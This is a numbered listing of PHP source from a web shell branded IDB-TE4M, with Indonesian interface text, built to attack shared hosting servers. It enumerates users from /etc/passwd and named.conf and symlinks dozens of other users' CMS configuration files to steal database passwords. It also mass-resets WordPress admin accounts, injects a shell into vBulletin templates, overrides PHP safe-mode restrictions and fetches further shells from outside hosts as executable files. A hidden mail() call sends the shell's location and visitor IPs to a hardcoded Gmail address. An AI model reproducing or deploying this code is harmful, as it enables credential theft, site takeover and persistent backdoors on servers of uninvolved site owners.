1010. if(isset($_POST['s'])){
1011.  
1012. $file = @file_get_contents('wp.txt');
1013.  
1014. $ex = explode("\n",$file);
1015.  
1016. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
1017. flush();
1018. flush();
1019.  
1020.  
1021. foreach ($ex as $exp){
1022.  
1023. $es = explode("||",$exp);
1024.  
1025. $config = $es[0];
1026.  
1027. $domin = $es[1];
1028.  
1029. $domins = trim($domin).'';
1030.  
1031. $readconfig = @file_get_contents(trim($config));
1032.  
1033. if(ereg('wp-settings.php',$readconfig)){
1034.  
1035.  
1036.  
1037. $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
1038.  
1039. $userdb = ex($readconfig,"define('DB_USER', '","');");
1040.  
1041. $db = ex($readconfig,"define('DB_NAME', '","');");
1042.  
1043. $fix = ex($readconfig,'$table_prefix = \'',"';");
1044.  
1045. $tab = $fix.'users';
1046.  
1047. $con = @mysql_connect('localhost',$userdb,$pass);
1048.  
1049. $db = @mysql_select_db($db,$con);
1050.  
1051. $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
1052.  
1053. $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
1054.  
1055.  
1056.  
1057. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
1058.  
1059. else
1060.  
1061. {
1062.  
1063. $r = '<b style="color:blue">failed</b>';
1064.  
1065. }
1066.  
1067. $domins = trim($domin).'';
1068.  
1069. echo "<tr>
1070. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1071. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
1072.  
1073. flush();
1074. flush();
1075.  
1076.  
1077.  
1078.  
1079.  
1080.  
1081. }else{
1082.  
1083. echo "<tr>
1084. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1085. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:blue'>failed2</tr>";
1086.  
1087. flush();
1088. flush();
1089.  
1090. }
1091.  
1092. }
1093.  
1094.  
1095.  
1096.  
1097.  
1098.  
1099.  
1100.  
1101.  
1102.  
1103. die();
1104.  
1105. }
1106.  
1107. if(!is_file('named.txt')){
1108.  
1109. $d00m = @file("/etc/named.conf");
1110.  
1111. }else{
1112.  
1113. $d00m = @file("named.txt");
1114.  
1115.  
1116. }
1117. if(!$d00m)
1118. {
1119.  
1120. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
1121. }
1122. else
1123.  
1124. {
1125. echo "<div class='tmp'>
1126. <form method='POST' action='$pg?sws=wp'>
1127. <input type='submit' value='Mass Change Admin' />
1128. <input type='hidden' value='1' name='s' />
1129. </form>
1130. <br /><br />
1131. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
1132.  
1133. flush();
1134. flush();
1135.  
1136. $f = fopen('wp.txt','w');
1137.  
1138. foreach($d00m as $dom){
1139.  
1140. if(eregi("zone",$dom)){
1141.  
1142. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1143.  
1144. if(strlen(trim($domsws[1][0])) > 2){
1145.  
1146. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1147.  
1148. ///////////////////////////////////////////////////////////////////////////////////
1149.  
1150. $wpl=$pageURL."idb/te4m/home/".$user['name']."/public_html/wp-config.php";
1151. $wpp=get_headers($wpl);
1152. $wp=$wpp[0];
1153.  
1154. $wp2=$pageURL."idb/te4m/home/".$user['name']."/public_html/blog/wp-config.php";
1155. $wpp2=get_headers($wp2);
1156. $wp12=$wpp2[0];
1157.  
1158. $wp3=$pageURL."idb/te4m/home/".$user['name']."/public_html/wp/wp-config";
1159. $wpp3=get_headers($wp3);
1160. $wp13=$wpp3[0];
1161.  
1162.  
1163. ////////// wp ////////////
1164.  
1165. $pos = strpos($wp, "200");
1166. $config="&nbsp;";
1167.  
1168. if (strpos($wp, "200") == true )
1169. {
1170. $config= $wpl;
1171. }
1172. elseif (strpos($wp12, "200") == true)
1173. {
1174. $config= $wp2;
1175. }
1176. elseif (strpos($wp13, "200") == true)
1177. {
1178. $config= $wp3;
1179. }
1180. else
1181. {
1182. continue;
1183.  
1184. }
1185. flush();
1186.  
1187. /////////////////////////////////////////////////////////////////////////////////////
1188.  
1189. $dom = $domsws[1][0];
1190.  
1191. $w = fwrite($f,"$config||$dom \n");
1192. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
1193.  
1194.  
1195. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
1196. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
1197. flush();
1198. flush();
1199.  
1200.  
1201.  
1202.  
1203.  
1204. flush();
1205.  
1206.  
1207. }
1208. }
1209. }
1210. }
1211.  
1212.  
1213. break;
1214.  
1215.  
1216. case 'vb':
1217.  
1218.  
1219. if(isset($_POST['s'])){
1220.  
1221.  
1222.  
1223. $file = @file_get_contents('vb.txt');
1224.  
1225. $ex = explode("\n",$file);
1226.  
1227. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
1228.  
1229.  
1230. foreach ($ex as $exp){
1231.  
1232. $es = explode("||",$exp);
1233.  
1234. $config = $es[0];
1235.  
1236. $domin = $es[1];
1237.  
1238. $domins = trim($domin).'';
1239.  
1240. $readconfig = @file_get_contents(trim($config));
1241.  
1242. if(ereg('vBulletin',$readconfig)){
1243.  
1244.  
1245.  
1246. $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
1247.  
1248. $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
1249.  
1250. $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
1251.  
1252. $con = @mysql_connect('localhost',$userdb,$pass);
1253.  
1254. $db = @mysql_select_db($db,$con);
1255.  
1256.  
1257. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
1258.  
1259. $query = @mysql_query($sqlfaq,$con);
1260.  
1261.  
1262.  
1263. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
1264.  
1265. else
1266.  
1267. {
1268.  
1269. $r = '<b style="color:blue">failed</b>';
1270.  
1271. }
1272.  
1273. $domins = trim($domin).'';
1274.  
1275. echo "<tr>
1276. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1277. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
1278.  
1279.  
1280.  
1281.  
1282.  
1283.  
1284.  
1285. }else{
1286.  
1287. echo "<tr>
1288. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1289. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:blue'>failed2</tr>";
1290. }
1291.  
1292. }
1293.  
1294.  
1295.  
1296.  
1297.  
1298.  
1299.  
1300.  
1301.  
1302.  
1303. die();
1304.  
1305. }
1306.  
1307. if(!is_file('named.txt')){
1308.  
1309. $d00m = file("/etc/named.conf");
1310.  
1311. }else{
1312.  
1313. $d00m = file("named.txt");
1314.  
1315.  
1316. }
1317. if(!$d00m)
1318. {
1319.  
1320. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
1321. }
1322. else
1323.  
1324. {
1325. echo "<div class='tmp'>
1326. <form method='POST' action='$pg?sws=vb'>
1327. <input type='submit' value='Inject shell' />
1328. <input type='hidden' value='1' name='s' />
1329. </form>
1330. <br /><br />
1331. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
1332.  
1333. $f = fopen('vb.txt','w');
1334.  
1335. foreach($d00m as $dom){
1336.  
1337. if(eregi("zone",$dom)){
1338.  
1339. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1340.  
1341. if(strlen(trim($domsws[1][0])) > 2){
1342.  
1343. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1344.  
1345. ///////////////////////////////////////////////////////////////////////////////////
1346.  
1347. $wpl=$pageURL."idb/te4m/home/".$user['name']."/includes/config.php";
1348. $wpp=get_headers($wpl);
1349. $wp=$wpp[0];
1350.  
1351. $wp2=$pageURL."idb/te4m/home/".$user['name']."/vb/includes/config.php";
1352. $wpp2=get_headers($wp2);
1353. $wp12=$wpp2[0];
1354.  
1355. $wp3=$pageURL."idb/te4m/home/".$user['name']."/forum/includes/config.php";
1356. $wpp3=get_headers($wp3);
1357. $wp13=$wpp3[0];
1358.  
1359.  
1360. ////////// vb ////////////
1361.  
1362. $pos = strpos($wp, "200");
1363. $config="&nbsp;";
1364.  
1365. if (strpos($wp, "200") == true )
1366. {
1367. $config= $wpl;
1368. }
1369. elseif (strpos($wp12, "200") == true)
1370. {
1371. $config= $wp2;
1372. }
1373. elseif (strpos($wp13, "200") == true)
1374. {
1375. $config= $wp3;
1376. }
1377. else
1378. {
1379. continue;
1380.  
1381. }
1382. flush();
1383.  
1384. /////////////////////////////////////////////////////////////////////////////////////
1385.  
1386. $dom = $domsws[1][0];
1387.  
1388. $w = fwrite($f,"$config||$dom \n");
1389. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
1390.  
1391.  
1392. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
1393. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
1394.  
1395.  
1396.  
1397.  
1398.  
1399. flush();
1400.  
1401.  
1402. }
1403. }
1404. }
1405. }
1406.  
1407.  
1408.  
1409.  
1410.  
1411.  
1412.  
1413.  
1414. break;
1415.  
1416. ############################ index #########################3
1417.  
1418.  
1419. case 'help':
1420.  
1421. echo "<div class='tmp'>
1422. <table align='center' width='40%'><td>function</td><td>Case</td>";
1423.  
1424.  
1425. $safe_mode = ini_get('safe_mode');
1426. if($safe_mode){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1427.  
1428. echo "<tr><td>Safe Mode</td><td>$r</td>";
1429.  
1430. $fun = function_exists('symlink');
1431. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1432.  
1433. echo "<tr><td>function symlink</td><td>$r</td>";
1434.  
1435.  
1436. $fun = function_exists('file');
1437. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1438.  
1439. echo "<tr><td>function file</td><td>$r</td>";
1440.  
1441. $fun = function_exists('file_get_contents');
1442. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1443.  
1444. echo "<tr><td>function file_get_contents</td><td>$r</td>";
1445.  
1446. $fun = function_exists('mkdir');
1447. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1448.  
1449. echo "<tr><td>function mkdir</td><td>$r</td>";
1450.  
1451.  
1452. $fun = is_dir('empek/amis.txt');
1453. if(!$fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1454.  
1455. echo "<tr><td>Permission denied</td><td>$r</td>";
1456.  
1457.  
1458. $fun = preg_match('/Forbidden/',@file_get_contents('empek/amis.txt') or !@file_get_contents('empek/amis.txt'));
1459. if($fun){$r = "<b style='color: blue'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
1460.  
1461. echo "<tr><td>Forbidden</td><td>$r</td>";
1462.  
1463.  
1464.  
1465.  
1466. echo "</table></div>";
1467.  
1468.  
1469.  
1470. break;
1471. default:
1472. header("Location: $pg");
1473.  
1474.  
1475.  
1476.  
1477. }
1478.  
1479.  
1480. /// home ///
1481. }else
1482. {
1483.  
1484.  
1485.  
1486. ?>
1487. <?php
1488. if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) {
1489. ?>
1490. <form action="?&amp;idb=config" method="post">
1491. <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
1492. echo '
1493. <form method="POST"><textarea cols="85" name="passwd" rows="20">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
1494. </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
1495. <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
1496. <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
1497. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
1498. if ($_POST['conf']) {
1499. $folfig = $_POST['folfig']; $type = $_POST['type'];
1500. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf bro fitur Symlink masih di disabled :( </blink>');}
1501. @mkdir($folfig, 0755);
1502. @chdir($folfig);
1503. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
1504. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
1505. $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
1506. foreach($passwd as $pwd){ $user=trim($pwd);
1507. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
1508. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
1509. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
1510. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
1511. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
1512. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
1513. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
1514. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
1515. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
1516. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
1517. @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
1518. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
1519. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
1520. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
1521. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
1522. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
1523. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
1524. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
1525. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
1526. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
1527. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
1528. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
1529. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
1530. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
1531. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
1532. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
1533. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
1534. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
1535. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
1536. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
1537. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
1538. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
1539. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
1540. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
1541. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
1542. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
1543. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
1544. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
1545. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
1546. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
1547. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
1548. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
1549. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
1550. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
1551. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
1552. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
1553. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
1554. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
1555. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
1556. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
1557. @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
1558. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
1559. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
1560. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
1561. @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
1562. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
1563. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
1564. @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
1565. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
1566. @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
1567. @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
1568. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
1569. @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
1570. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
1571. @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
1572. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
1573. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
1574. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
1575. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
1576. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
1577. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
1578. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
1579. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
1580. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
1581. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
1582. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
1583. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
1584. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
1585. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
1586. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
1587. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
1588. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
1589. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
1590. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
1591. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
1592. }
1593. echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
1594. }
1595. }
1596. ?>
1597. <?php
1598. @ini_set('output_buffering', 0);
1599. @ini_set('display_errors', 0);
1600. set_time_limit(0);
1601. ini_set('memory_limit', '64M');
1602. header('Content-Type: text/html; charset=UTF-8');
1603. $tujuanmail = 'kefiex403@gmail.com';
1604. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
1605. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
1606. mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
1607. ?>
1608. <?php
1609. if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
1610. ?>
1611. <form action="?&amp;idb=auto" method="post">
1612. <?php
1613. echo "<html><head><title>MATAMU PICEK !!!!</title>";
1614. echo "<body bgcolor='black'>";
1615. echo "<center><h1><font color='blue'>IndahNya Berbagi<br/>IDB-TE4M</font></center></head>
1616. </h1><hr><br/>";
1617. echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
1618. echo "<font size='6' color='blue'><center>MINTA IJIN DULU SAMA SERVER</center></font><br/>";
1619. echo "<div align='center'>";
1620. echo "<input type='submit' name='idb' value='IJIN SERVER'><br/> <br/>";
1621. echo "</div>";
1622. echo "<font size='5' color='blue'><center>PILIH SALAH SATU VERSI CGI DIBAWAH</center></font><br/>";
1623. echo "<div align='center'>";
1624. echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
1625. echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
1626. echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
1627. echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
1628. echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
1629. echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
1630. echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
1631. echo "<input type='submit' name='te4m7' value='-=[ TES ]=-'></p> ";
1632. echo "</div>";
1633.  
1634.  
1635. $sh = 'file_get_contents';
1636.  
1637. if($_POST['idb']) {
1638. $ini = "php.ini";
1639. $open = fopen($ini, 'w');
1640. $source = ("safe_mode = OFF n
1641. disable_functions = NONE n
1642. safe_mode_gid = OFF n
1643. open_basedir = OFF n
1644. register_globals = ON n
1645. exec = ON n
1646. shell_exec = ON n");
1647. fwrite($open, $source);
1648. echo "<font color='lime'>";
1649. if($open) {
1650. echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
1651. }
1652. else {
1653. echo "<font color='blue'>";
1654. echo '<hr><p>GAGAL kang </p>';
1655. echo "</font>";
1656. fclose($open);
1657. } }
1658.  
1659. if($_POST['te4m']) {
1660. $cgi = 'http://el-ro.yu.tl/files/in.zip';
1661. $get11 = $sh($cgi);
1662. $idbk = fopen('hsh.php', 'w');
1663. fwrite($idbk,$get11);
1664. fclose($idbk);
1665. {
1666. @chmod('hsh.php',0755);
1667. }
1668. echo "<font color='aqua'>";
1669. echo "<hr>shell hsh sukses dibuat :D <br/>
1670. Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>";
1671. echo "</font>";
1672. }
1673. echo "</font>";
1674.  
1675. if($_POST['te4m1']) {
1676. $cgi = 'http://el-ro.yu.tl/files/beiz.zip';
1677. $get11 = $sh($cgi);
1678. $idbk = fopen('info.php', 'w');
1679. fwrite($idbk,$get11);
1680. fclose($idbk);
1681. {
1682. @chmod('info.php',0755);
1683. }
1684. echo "<font color='aqua'>";
1685. echo "<hr>tools sukses dibuat :D <br/>
1686. Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='info.php' target='_blank'>DISINI</a></center></br>";
1687. echo "</font>";
1688. }
1689. echo "</font>";
1690.  
1691. if($_POST['te4m2']) {
1692. $cgi = 'http://el-ro.yu.tl/files/whm.zip';
1693. $get11 = $sh($cgi);
1694. $idbk = fopen('whm.php', 'w');
1695. fwrite($idbk,$get11);
1696. fclose($idbk);
1697. {
1698. @chmod('whm.php',0755);
1699. }
1700. echo "<font color='aqua'>";
1701. echo "<hr>whm killer sukses dibuat :D <br/>
1702. Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>";
1703. echo "</font>";
1704. }
1705. echo "</font>";
1706.  
1707. if($_POST['te4m3']) {
1708. $cgi = 'http://el-ro.yu.tl/files/dm.zip';
1709. $get11 = $sh($cgi);
1710. $idbk = fopen('links.php', 'w');
1711. fwrite($idbk,$get11);
1712. fclose($idbk);
1713. {
1714. @chmod('links.php',0755);
1715. }
1716. echo "<font color='aqua'>";
1717. echo "<hr>shell DM sukses dibuat :D <br/>
1718. Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>";
1719. echo "</font>";
1720. }
1721. echo "</font>";
1722. if($_POST['te4m5']) {
1723. $cgi = 'http://kefiex.yu.tl/files/sabun.zip';
1724. $get11 = $sh($cgi);
1725. $idbk = fopen('sabun.php', 'w');
1726. fwrite($idbk,$get11);
1727. fclose($idbk);
1728. {
1729. @chmod('sabun.php',0755);
1730. }
1731. echo "<font color='aqua'>";
1732. echo "<hr>sabun massal :D <br/>
1733. Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>";
1734. echo "</font>";
1735. }
1736. echo "</font>";
1737. if($_POST['te4m6']) {
1738. $cgi = 'http://kefiex.yu.tl/files/olenk.zip';
1739. $get11 = $sh($cgi);
1740. $idbk = fopen('bn.php', 'w');
1741. fwrite($idbk,$get11);
1742. fclose($idbk);
1743. {
1744. @chmod('bn.php',0755);
1745. }
1746. echo "<font color='aqua'>";
1747. echo "<hr>config kill :D <br/>
1748. Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>";
1749. echo "</font>";
1750. }
1751. echo "</font>";
1752. if($_POST['te4m4']) {
1753. $cgi = 'http://kefiex.yu.tl/files/b.zip';
1754. $get11 = $sh($cgi);
1755. $idb1k = fopen('.pl', 'w');
1756. fwrite($idb1k,$get11);
1757. fclose($idb1k);
1758. {
1759. @chmod('.pl',0755);
1760. }
1761. echo "<font color='aqua'>";
1762. echo "<hr>CGIProxy sukses dibuat :D <br/>
1763. Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='.pl' target='_blank'>DISINI</a></center></br>";
1764. echo "</font>";
1765. }
1766. echo "</font>";
1767. if($_POST['te4m7']) {
1768. $cgi = 'http://kefiex.yu.tl/files/hsh.zip';
1769. $get11 = $sh($cgi);
1770. $idb1k = fopen('hsh.zip', 'get');
1771. fwrite($idb1k,$get11);
1772. fclose($idb1k);
1773. {
1774. @chmod('hsh',0755);
1775. }
1776. echo "<font color='aqua'>";
1777. echo "<hr>CGIProxy sukses dibuat :D <br/>
1778. Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='hsh' target='_blank'>DISINI</a></center></br>";
1779. echo "</font>";
1780. }
1781. echo "</font>";
1782. }
1783. ?>
